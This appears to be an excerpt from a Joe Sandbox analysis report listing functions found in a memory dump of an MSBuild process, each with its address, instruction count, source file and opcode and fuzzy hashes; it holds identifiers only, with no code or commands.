                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 813d3e0a5e09024db9e1ec6c38a27def6eec417d3c2e06aa9a41692d9bcfef91
                                                                                                              • Instruction ID: 854c014f6c95defc1cabacc3c8f6fe551eac13ba73e2bd5ee849614635a091dd
                                                                                                              • Opcode Fuzzy Hash: 813d3e0a5e09024db9e1ec6c38a27def6eec417d3c2e06aa9a41692d9bcfef91
                                                                                                              • Instruction Fuzzy Hash: C541A032940609CFDB25DF6CD8947EE7BB4FB14318F15016ED611BBAA1EB349A00CBA0
                                                                                                              Function 01398BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84ea2230a1dd0212912470d5a16fd314b4cd3f28b63c60f7cb894db550ff3b3f
                                                                                                              • Instruction ID: 01ff490392cf327505819f1db5468abb143bf3b2b36763d13e4725de40d124ed
                                                                                                              • Opcode Fuzzy Hash: 84ea2230a1dd0212912470d5a16fd314b4cd3f28b63c60f7cb894db550ff3b3f
                                                                                                              • Instruction Fuzzy Hash: A041F372A0020ACBDF249F5CC880B9EBBB5FBD5708F19806ED6019B665C735D842CF90
                                                                                                              Function 01388918 Relevance: .1, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6995406b4889fb8c21b153a513d3838718b0214ee9fd823d1c96ccc8608a59dc
                                                                                                              • Instruction ID: e38c8cbaa9e6bff21820a10ce695bdf1392ff5645cfe03950d6822117c96e764
                                                                                                              • Opcode Fuzzy Hash: 6995406b4889fb8c21b153a513d3838718b0214ee9fd823d1c96ccc8608a59dc
                                                                                                              • Instruction Fuzzy Hash: 884161315083169FD712EF69C880AABF7E9EF84B58F40092AFA84D7550E731DE048B93
                                                                                                              Function 0138A020 Relevance: .1, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction ID: 65da9bfee0ac3e6f79ddebd1896f71dd646e43c50a20ded8734b228a80305ae8
                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction Fuzzy Hash: 9F418C71A00325DBDB12EF5C84887BAFBB1EB5075DF15806BEA409B284D6328D46CB90
                                                                                                              Function 013909AD Relevance: .1, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ce144ad0ea552e45c768a3493eb2204af37363ce7c1a65ea3d606248db17b26a
                                                                                                              • Instruction ID: 5006c4636d28b7d093e65fdf57efa24c2c994d0ba3d28ef035834f04ff17b6ad
                                                                                                              • Opcode Fuzzy Hash: ce144ad0ea552e45c768a3493eb2204af37363ce7c1a65ea3d606248db17b26a
                                                                                                              • Instruction Fuzzy Hash: 7F417A71640701EFEB25CF18C840B26BBF9FF54318F60862AE4498B651E774E942CB90
                                                                                                              Function 013C0710 Relevance: .1, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction ID: b16e42cf46e31d7f5d983741f6270f1d6ddb94c2d2b9b0aa45963e751a7d532f
                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction Fuzzy Hash: 88412875A00745EFDB28CF98C990AAABBF8FF18B04B10896DE656D7650D330AE44CF50
                                                                                                              Function 0139262C Relevance: .1, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1f079fcdbadcb215163ebe4af8fab78db7a95d5370075ce495570e8812c5f2be
                                                                                                              • Instruction ID: c97d0b1ccd11c7ea5bf2819accfee31ab08d0cd784dd2c931165df2fa0f3a39c
                                                                                                              • Opcode Fuzzy Hash: 1f079fcdbadcb215163ebe4af8fab78db7a95d5370075ce495570e8812c5f2be
                                                                                                              • Instruction Fuzzy Hash: A741B3B1502B05EFCB21EF2CC940B6EB7F5FF45328F11815AC50AAB6A1DB70A941CB91
                                                                                                              Function 013CC8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e5d0e10a9b65c8f7b5b33b013f17d6d68b334b69855a2cf71c5cd783f7e18732
                                                                                                              • Instruction ID: 28cd7e4ca48b12c861eeefb89d6e8450f8d57b24a0b1f9e1cbb6e200da196c5a
                                                                                                              • Opcode Fuzzy Hash: e5d0e10a9b65c8f7b5b33b013f17d6d68b334b69855a2cf71c5cd783f7e18732
                                                                                                              • Instruction Fuzzy Hash: BC316AB1A00345DFDB12DF58C540799BBF4FB49B28F2185AED119EB291D7369902CF90
                                                                                                              Function 014107C3 Relevance: .1, Instructions: 114COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 83a82ca316e9dd2f52dfd710316597496b916f057b26587aeab77dda1e59e82c
                                                                                                              • Instruction ID: a84e28386acb7cb81824b9c79c400fdb075cc9977b38d0621e2dbf0241e198ca
                                                                                                              • Opcode Fuzzy Hash: 83a82ca316e9dd2f52dfd710316597496b916f057b26587aeab77dda1e59e82c
                                                                                                              • Instruction Fuzzy Hash: 4441AE729083019FD360DF29C845B9BBBE8FF88618F004A2EF998C7260D730D945CB92
                                                                                                              Function 013880A0 Relevance: .1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b546a7fbda696cd6c32dc2b2bd58b99050dca5d4f8559ead0acaf9a64a63dea
                                                                                                              • Instruction ID: e47500957eec9ccc0a6312feb887263712573d61ebbfa35f79d1568164b28e85
                                                                                                              • Opcode Fuzzy Hash: 3b546a7fbda696cd6c32dc2b2bd58b99050dca5d4f8559ead0acaf9a64a63dea
                                                                                                              • Instruction Fuzzy Hash: EF410371A0471AEFCB11EF1CC8806A8B7B5FF44768F608269D816A7680DF34ED418BD0
                                                                                                              Function 014105A7 Relevance: .1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52e95e3b541e5d5931a31872580ec3daf21b1b799959dfe6e073628872ec9fee
                                                                                                              • Instruction ID: 4d3243af5364c11343440811d0ba53dc8f29a2db6f8c8bb3fbe1588be61982ec
                                                                                                              • Opcode Fuzzy Hash: 52e95e3b541e5d5931a31872580ec3daf21b1b799959dfe6e073628872ec9fee
                                                                                                              • Instruction Fuzzy Hash: 9041B1726046429FC320DF6CD840A6BB7A5FFC8700F144A2EF998976A4E730E954C7A6
                                                                                                              Function 01394859 Relevance: .1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cbe91ddd812f514c3734ce893615247e932efb3d507c9d3af304bbced6afdfb
                                                                                                              • Instruction ID: 748441c7211544aa8d8fa03f99b62fd3d678e666bad121a3fb042ab14a29c93f
                                                                                                              • Opcode Fuzzy Hash: 8cbe91ddd812f514c3734ce893615247e932efb3d507c9d3af304bbced6afdfb
                                                                                                              • Instruction Fuzzy Hash: BF41E9306043028FDF25DF2CD984B2ABBEAFF80358F14442DEA558B2A1DB30D942CB51
                                                                                                              Function 01388B50 Relevance: .1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eeb8b3843d15fd6de46cf3d0232f79b10e066129d9e651a38ab253b1237c897b
                                                                                                              • Instruction ID: 7fdd1eb5fb76083688bb5b4f146c0e8cab22c738996077122707d1d476f5706c
                                                                                                              • Opcode Fuzzy Hash: eeb8b3843d15fd6de46cf3d0232f79b10e066129d9e651a38ab253b1237c897b
                                                                                                              • Instruction Fuzzy Hash: 1C4180B1A017198FCF15EF6DC98099DFBF1FF88328B5085AAD466A7690D734A901CB40
                                                                                                              Function 013A02E1 Relevance: .1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                              • Instruction ID: cfbddf2b111d8c82a706b241fc9b51a964ef0c42e3c8188a79e6bc3a4b506092
                                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                              • Instruction Fuzzy Hash: 5031F531A04245ABDB11CB6CCC80B9BBFE9EF15358F0445A9F455D7392C7749884CBA0
                                                                                                              Function 0143E3DB Relevance: .1, Instructions: 105COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d7726ccd4b72f4b7e571ac85cf439d5d676d60a749928e336d001a0ab7c70f38
                                                                                                              • Instruction ID: 18d6cfcb138638d5a953244e1b6203023f9c0cd0ef6d7e08bc4806ce435bd45d
                                                                                                              • Opcode Fuzzy Hash: d7726ccd4b72f4b7e571ac85cf439d5d676d60a749928e336d001a0ab7c70f38
                                                                                                              • Instruction Fuzzy Hash: 28318835741716ABD7229F598C81FAF76A9EB9DB54F000039FA04BB391DAB4DD01C7A0
                                                                                                              Function 01444B4B Relevance: .1, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fe75f7bfae18fa5f26da16e609fc01a10442f411b44fa7ad824138717a15d3af
                                                                                                              • Instruction ID: d79b0efcd2f41ace3c577a48d8c7f457130eb9dccff4f2389afcf9fbcf2316dc
                                                                                                              • Opcode Fuzzy Hash: fe75f7bfae18fa5f26da16e609fc01a10442f411b44fa7ad824138717a15d3af
                                                                                                              • Instruction Fuzzy Hash: CE31D0726052018FE321DF1DD880F2AB7E6FB80360F0E446EE9999B761DB30E801CB95
                                                                                                              Function 01394260 Relevance: .1, Instructions: 102COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 779abd5e6f609ae01d07dc4a4b15ccd1ba0df9c80796597e1b26788cbfe1d5d9
                                                                                                              • Instruction ID: 750515f030d128d5adeb80498604e9b863b98eff1099330d22b39105826b0ea2
                                                                                                              • Opcode Fuzzy Hash: 779abd5e6f609ae01d07dc4a4b15ccd1ba0df9c80796597e1b26788cbfe1d5d9
                                                                                                              • Instruction Fuzzy Hash: 0441AE75200B45EFDB26CF2CC981BDA7BE9AF45318F05842DE6998B351C774E805CBA0
                                                                                                              Function 01444BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8ffba1f97bc72ccc30ba90d41e2baf2ebc18fd09f0045887d5978de5a391d9e
                                                                                                              • Instruction ID: 3a6b97ab473dc9a19bd423c5100aa49bfa81d4535637f971b25bbd6c57594df1
                                                                                                              • Opcode Fuzzy Hash: d8ffba1f97bc72ccc30ba90d41e2baf2ebc18fd09f0045887d5978de5a391d9e
                                                                                                              • Instruction Fuzzy Hash: F2317E716043019FE720DF29C880B2AB7E5FB84720F0E456EF9559B761EB30E805CB95
                                                                                                              Function 0140EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7eac5f4603df459cbbf7a5e2bb799935cd9b0a5cf87a66cd63ec1a72c3401d85
                                                                                                              • Instruction ID: ca5df06deb57e196a587afe7777521e220adb354a0bd5d665d15675595fcc5a5
                                                                                                              • Opcode Fuzzy Hash: 7eac5f4603df459cbbf7a5e2bb799935cd9b0a5cf87a66cd63ec1a72c3401d85
                                                                                                              • Instruction Fuzzy Hash: B131C771205A82DBF327975EC948B16BBE8FB40744F1D08B6AB45A77F1DB38D851C260
                                                                                                              Function 014561C3 Relevance: .1, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f986ba82d28b0a7f6f02da860f7d4a3cbd1c0e8135f1bafbd015c34daa0ae49c
                                                                                                              • Instruction ID: 31064d19543554cb382319f218c873dd8ce1d80bba57492b26dd5964dc8b63aa
                                                                                                              • Opcode Fuzzy Hash: f986ba82d28b0a7f6f02da860f7d4a3cbd1c0e8135f1bafbd015c34daa0ae49c
                                                                                                              • Instruction Fuzzy Hash: 8731E476A00216ABDB15DF98CC40FAEB7B5FB44784F864169F900AB255D770ED40CB94
                                                                                                              Function 0143483A Relevance: .1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 834d1cc080506da7b99be48f0a868ac2b01d2b800d1022cc9684717347c794c8
                                                                                                              • Instruction ID: 126ac1fa16bff531af0148a2b64b8b9f26b34217000413f966dabec14b322409
                                                                                                              • Opcode Fuzzy Hash: 834d1cc080506da7b99be48f0a868ac2b01d2b800d1022cc9684717347c794c8
                                                                                                              • Instruction Fuzzy Hash: 2B313276A4012DABCF61DF69DC84BDEBBB5AF98350F1400E5A508A7260DA34DE918F90
                                                                                                              Function 013BEB20 Relevance: .1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 531630ad4a541c3c44c4855c3b0bc9d45a4860e5bc583d29a007d76e0485a438
                                                                                                              • Instruction ID: 072aff974bbb639dbf188c4e50b8777790b44c533475980d14df4678f2fcee13
                                                                                                              • Opcode Fuzzy Hash: 531630ad4a541c3c44c4855c3b0bc9d45a4860e5bc583d29a007d76e0485a438
                                                                                                              • Instruction Fuzzy Hash: B1319772E04219AFDB21DFADCC80AEEBBF9EF44754F114479EA15D7650E6709E008BA0
                                                                                                              Function 014560B8 Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2e14d2ce872eaa1412bd4d09ec7476b3a58a1633731356dcb99aa9991c636e9c
                                                                                                              • Instruction ID: 3c8f2a1579dbad39f1be04ca1164351f17435969f819d17b7ad36f010e6a8cd9
                                                                                                              • Opcode Fuzzy Hash: 2e14d2ce872eaa1412bd4d09ec7476b3a58a1633731356dcb99aa9991c636e9c
                                                                                                              • Instruction Fuzzy Hash: E031A271B00606ABDB12AFADC850B7FB7B9EB44754F55406AE905DB362DA30DD018B90
                                                                                                              Function 013907AF Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f013b67ade784d6c688c72a38dedeb09aa55b2affbe1b2eb46f03eae2d00f67b
                                                                                                              • Instruction ID: 7ce6eace335601f10118402326c962837bce6f053e596f2ac479612057662cf8
                                                                                                              • Opcode Fuzzy Hash: f013b67ade784d6c688c72a38dedeb09aa55b2affbe1b2eb46f03eae2d00f67b
                                                                                                              • Instruction Fuzzy Hash: DB31E832B08716DBCF16EE68888096BBFEDEF94658F014529FD559B310DA30DC1187E1
                                                                                                              Function 01398550 Relevance: .1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9b836e8780df1720019621a25137048211f2494ba638e11d4febf7f7c3842fcb
                                                                                                              • Instruction ID: bdff193e681f7924dcbb764fe9894ea0879344631ce0953e4d35b78b5c2409ce
                                                                                                              • Opcode Fuzzy Hash: 9b836e8780df1720019621a25137048211f2494ba638e11d4febf7f7c3842fcb
                                                                                                              • Instruction Fuzzy Hash: BC3180B2605302CFE720CF19C840B5BBBE5FB98708F05496DEA8497791D770E848CB91
                                                                                                              Function 013CA6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction ID: 6244115e5eba028ef6837680f6aff527cb9eefdd101c7c5558128d776936a9dc
                                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction Fuzzy Hash: DD312AB2B01B05AFD761CFAEDD40B57BBF8BB08A54F04092DA59AC3650F630E9008B60
                                                                                                              Function 0143EBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c3e40202a6ab8b843c5847882990c890e014fddf976e3f18ee3a3f4b82176b06
                                                                                                              • Instruction ID: 9bc3022ef9b3bf9710db4aef306c76db61d844030f212bf7b4bda2f0b05fc126
                                                                                                              • Opcode Fuzzy Hash: c3e40202a6ab8b843c5847882990c890e014fddf976e3f18ee3a3f4b82176b06
                                                                                                              • Instruction Fuzzy Hash: 62318971506302CFCB11EF1AC54095EBBF1FF89618F4589AEE488AB361E331D946CB92
                                                                                                              Function 013B438F Relevance: .1, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 86ffc0eafa2305a5c965da57293dbf082325320f0726df551e15879dad3df2b0
                                                                                                              • Instruction ID: 83ffe477ce40f15e798ff48f818a88d2015948c0fc04e485ecd682b91d25f707
                                                                                                              • Opcode Fuzzy Hash: 86ffc0eafa2305a5c965da57293dbf082325320f0726df551e15879dad3df2b0
                                                                                                              • Instruction Fuzzy Hash: C631D671B002059FD720DFA8C9C1AAEBBF9FB8430CF008529D246E7A55E734D941CB50
                                                                                                              Function 0138CB7E Relevance: .1, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                              • Instruction ID: 77d3adfef16ee63f19af50cb0cccc23907b9a67a94b0cb9a3bf7ee61b9927e8b
                                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                              • Instruction Fuzzy Hash: 36210932E0076AABDB119BB98840BEFBBB9AF14744F0580359E15E7340E270C90187A0
                                                                                                              Function 0138C156 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e60e9583769ef5412fbde612fbfedb58e8246c7ab524ae95cd1798c639f498ac
                                                                                                              • Instruction ID: d94b805d81fbbb86352c20306365dab4b3a215cc0fe0fb2ba6dd6e2dbbc3498d
                                                                                                              • Opcode Fuzzy Hash: e60e9583769ef5412fbde612fbfedb58e8246c7ab524ae95cd1798c639f498ac
                                                                                                              • Instruction Fuzzy Hash: 4A3149B15003118BDB21AF5CCC45BA977F8FF5031CF8481A9DD899B3C2EA349982CB90
